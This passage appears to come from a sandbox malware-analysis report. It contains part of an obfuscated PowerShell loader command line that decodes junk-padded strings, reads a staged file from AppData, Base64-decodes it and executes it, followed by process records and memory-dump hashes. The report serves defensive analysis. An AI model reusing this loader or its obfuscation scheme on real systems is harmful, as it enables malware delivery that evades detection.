uNonderRemitd PhileLysaarDespeiF,dtun Par.gExtersfron ]gra,e=.eren$YahunACorreh PreeiMin.tsKonkrtKnfrioAnskurChorei upec aryt ');$Sandfangene=Hungerless ' dkmpFBusl,uHesten,ndosk F dntPurgaiBouleo GlownkommesWishlaStratfSvi,epAchror,reenv Allon ChiniAgonin s opgCompueOmvltn BiotsRegre.Dyst D IndioUnselwOuvernh tudlBat,uo FiniaCoonidForevF ParaiDeaktlkvg neSprag(Outmo$TidsfS PreaaDansed ,rtseIrremlOrkanm Friea orsogFlooreArbejr Emesv AnderElektkSpildsTrykktRaas.e ,kildAnateeDeca t Fred, rklr$R.bbeKAstrolVestsa SsonmDoetmmVa.ske,uxocralko.nN.okee DegesGeuma)Ferio ';$Sandfangene=$Raadslaaet[1]+$Sandfangene;$Klammernes=$Raadslaaet[0];toptekster (Hungerless 'Ophth$ G,legOxblolsubvioNymphbW lfwasus,nlInval:un.asNStal,oSphenn PlancBoussa AfkarAudiotLambke DeadlJaguaiDekomzUreteeTone.dDingesRifer=Kredi(revolTPigene rkaisMletktSporv-RecipP BrasaStanzt pekth Tend Sk dt$Di.krKOradblAn.peaT.stsmTordimUncree arsirDdspanBrevde BandsBirnm)Philo ');while (!$Noncartelizeds) {toptekster (Hungerless 'Ameto$Kol,egRkkehlOprejoperinblkassa,ienolAande:PurpeTHexahi hvill D.oxb Wordakr.tkgchatte indfReprsrAmiabs,loakeretn lBaku s Me s=Blads$P.nthtOffenrVideruWooleeProgr ') ;toptekster $Sandfangene;toptekster (Hungerless 'AntiqSse,rtt .anda,umerrUdsugtMirac-Mi,caSsa,nslWencke.elleeMutu pPin,a Fors.4Fresi ');toptekster (Hungerless 'Comid$Histog Sugel Torpo,gelibRad oa Fronl Uncl:Laur.NArkfdo Vurdn ,oencCopriaDeossrJoypotBrnepeIlseblIntr.iHieroz lageRun edBeanesStyri=,iske(Vaag,TButcheVerd.sHymnetFront-reklaP,ksema,ogittUns ohKont, Bilbo$indskKSkalalInfarasl,tamfly,em.aarnedistir Surcndi.cue Fatts Resp)reple ') ;toptekster (Hungerless 'R,gis$Engagg .inylErhveoSom.sbG,adya skollThr.a:.lappOAmy,op ,orlsLingui Upwag AffreDk man ValedPartiemiliessubvo=Distr$SkuedgWo.drlAvi,noPyranbVict.aToboglEska.:CrossSStrukpArbeji ChocrRestaaRo,anlYder.fFidusjSulfoeRecrudRe ideForfrrPreste ForsnEvneds s,nd+Figur+Un,ut%A,rod$ VedeV Siphe Icter G,mnmGeri,iPr,shlOutcuiDelren SootgSchwauchorieEfters B at.Frstecsup 
rofantauStensn M.lltOve.m ') ;$Sadelmagervrkstedet=$Vermilingues[$Opsigendes];}toptekster (Hungerless 'Konde$T,rbigOakuml ReimoAutombSesquaTo,etl rei :T upeIMyst,nBonittup,pleDragsr GlykmKundseCass zM rgizTrysto HaptsProsc ,ass=Sodde StokrGHondpeLentitTil t-InterCInd.eo Primn olastHonn eNonbunRerattTreho Kvet$Ca spKBespnlDistraBontemHolopmUncone LuftrLouizn OprueTak esRee,l ');toptekster (Hungerless 'Brike$Billeg Kni l ,onsomariobProfuaGastal Fast:Mug,ehIsdesywanwep silueSjl arProtolJe oroBirdlgNucleiPiestcStictaAffall Kaffi,rogrtKlu.cyUd.ta Agte=Tilhu Showi[ prodSA.ekkyvarefs S.aatVi dee H,enm unpo.ForsiCP.ylloSpermnUkuravSu.maePericrSidegtMisd.]Zinkk: ulbj:DiallFSpndhr Vin,osmaasm ,ithB nteaExc,usSterieSpege6R ind4BetroS SurgtFormar No ei,kurknRaadigCello(D.mor$Koty.IbygninEva.utAgaveeinstirDiatomBut.eeBanenzElvrkzomstno SkinsSpalt)vejle ');toptekster (Hungerless ' Neap$PipikgGallelSeparo,riesbMet,daBnnesl Vome:BurguG SchmrGeokeaLnud,a Overlh kseiUtilbgBuffe lokk=skrek Marin[,nvirSunidey nvessTricrt Forpe windm Stik. Ulv TSide,eSubofxChac.tKorpu.Afma.ESeparn ynancM.rahoGrunddReen.i U,denAalbogUopsl]Fusta:Ru,my:DelikAKaldeSFunktCTankeIMacroILards.NonflGHang,e FaldtHalvdSam notHypnor IndeiTredknOpdrigMtaa,(Humou$presbh ,oenyBaad.pScrubeRisotrKilldlBlan.o Ger.gOversiGenercTr.vra FrdilArchaiFishmt.ryseyU amb)Perth ');toptekster (Hungerless 'Uncoh$M.lligSprn.l Sa moKo.mabKvaliaFor.klPa.ne:OmvenD skovi TidevIntereMiljrrGerfasTuli.iBenchf bbediLan se Kn,cdSorte=Subti$PantoGInsurrGinglaLilleaAccesl Almei S bsgmorga. BewesUlsteu Mu.tbZickasHa.vdtForm rMonopi Ca.dnScr wg Dags( F,jl2Indfa8 emil5 Grun0Ankr 8Sen.i7Ble d,devov3,nder0Turna1 mano4 rsta6Fortr).tort ');toptekster $Diversified;"
                                  Imagebase:0x7ff6e3d50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:08:06:24
                                  Start date:23/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff66e660000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:08:06:26
                                  Start date:23/04/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $"
                                  Imagebase:0x7ff6a8c40000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2243040951.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fa4a8fedda6d5524588f4666a6e473d3c0eab3807a803f7eb53b1ce40abc0d31
                                    • Instruction ID: efd1c40d786129f443f04ada7c027467f4c7d8ba41cf109fb8d5609bd0dc8675
                                    • Opcode Fuzzy Hash: fa4a8fedda6d5524588f4666a6e473d3c0eab3807a803f7eb53b1ce40abc0d31
                                    • Instruction Fuzzy Hash: 08410622F0CA499FEB95EA9C94B16B8B7D1EF5A360F1800BEC14DC7187D92DB801C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2243040951.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ee2d74450f97be19eb2fa1df39ec544da978270806ca3166fc78c9f6679cba27
                                    • Instruction ID: e69a55a4e8614d362ea8a06d440817bba8189896def5e1f75fc78291cd3025c4
                                    • Opcode Fuzzy Hash: ee2d74450f97be19eb2fa1df39ec544da978270806ca3166fc78c9f6679cba27
                                    • Instruction Fuzzy Hash: DB11E322F0DA459FEBA5EA9850B427877D1EF5A334B0400BEC14DC7187D92DA8018315
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2242717271.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                    • Instruction ID: 241876a0f25de1cf04efdc636e1e615018bbc16f719980464517d69e48099cc2
                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                    • Instruction Fuzzy Hash: 8A01677121CB0D4FD744EF4CE451AA5B7E0FB99364F10056DE58AC3651D636E881CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2242717271.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: N_^$N_^$N_^$N_^$N_^
                                    • API String ID: 0-2528851458
                                    • Opcode ID: 2ce1fa143fca7212c373bd0507f1506b3469e24c05d2a51b0854fdfd3f37f853
                                    • Instruction ID: ec3dfa5c290f02f717f7c410f78b9e35c453abe4219d7ed9978b88d712c26481
                                    • Opcode Fuzzy Hash: 2ce1fa143fca7212c373bd0507f1506b3469e24c05d2a51b0854fdfd3f37f853
                                    • Instruction Fuzzy Hash: 82919253B1EFC25FE75357680CB90A96FA0EF6325470908F6C69ACB093E91D28079792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2242717271.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: N_^
                                    • API String ID: 0-884294832
                                    • Opcode ID: 0bf03c7ac3dd247de43e241a9d27dd227d2d71c122416b6f6018854cdb8651a6
                                    • Instruction ID: 0babbd2f470167b6cefd4414a825361eac67c445fa4a83e5a0b01e2cfb203364
                                    • Opcode Fuzzy Hash: 0bf03c7ac3dd247de43e241a9d27dd227d2d71c122416b6f6018854cdb8651a6
                                    • Instruction Fuzzy Hash: 0F518357B1DBD35BF322432C4CBA0EA6FD0EF5326570914B7C7D5CA493EA0D6806A291
                                    Uniqueness

                                    Uniqueness Score: -1.00%